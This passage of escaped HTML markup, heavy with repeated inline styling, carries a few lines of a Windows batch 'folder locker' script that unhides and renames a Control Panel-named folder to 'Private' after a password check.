!important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;25.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;26.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Private&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;27.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;echo Folder Unlocked successfully&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;28.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;goto End&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;29.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(255, 255, 255) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;:FAIL&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt2" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(92, 92, 92) !important; display: block !important; float: left !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0.3em !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: right !important; top: auto !important; vertical-align: baseline !important; width: 3em !important;"&gt;30.&lt;/code&gt;&lt;span class="content" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: rgb(248, 248, 248) !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-color: rgb(108, 226, 108) !important; border-left-style: solid !important; border-left-width: 3px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 3.3em !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;span class="block" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: url(http://www.tudosobrehacker.com/plugins/content/codecitation/styles/wrapping.png) !important; background-position: 0px 1.1em !important; background-repeat: no-repeat !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; display: block !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 7px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 1.5em !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; text-indent: -1.5em !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="plain" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: rgb(0, 0, 0) !important; display: inline !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;echo Invalid password&lt;/code&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class="line alt1" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; float: none !important; font-family: Consolas, Monaco, 'Bitstream Vera Sans Mono', 'Courier New', Courier, monospace !important; font-size: 1em !important; font-style: normal !important; font-weight: normal !important; height: auto !important; left: auto !important; line-height: 1.1em !important; margin-bottom: 0px !important; margin-left: 0px !important; margin-right: 0px !important; margin-top: 0px !important; outline-color: initial !important; outline-style: initial !important; outline-width: 0px !important; padding-bottom: 0px !important; padding-left: 0px !important; padding-right: 0px !important; padding-top: 0px !important; position: static !important; right: auto !important; text-align: left !important; top: auto !important; vertical-align: baseline !important; width: auto !important;"&gt;&lt;code class="number" style="-webkit-background-clip: initial !important; -webkit-background-origin: initial !important; background-attachment: initial !important; background-color: initial !important; background-image: none !important; background-position: initial initial !important; background-repeat: initial !important; border-bottom-width: 0px !important; border-color: initial !important; border-left-width: 0px !important; border-right-width: 0px !important; border-style: initial !important; border-top-width: 0px !important; bottom: auto !important; color: 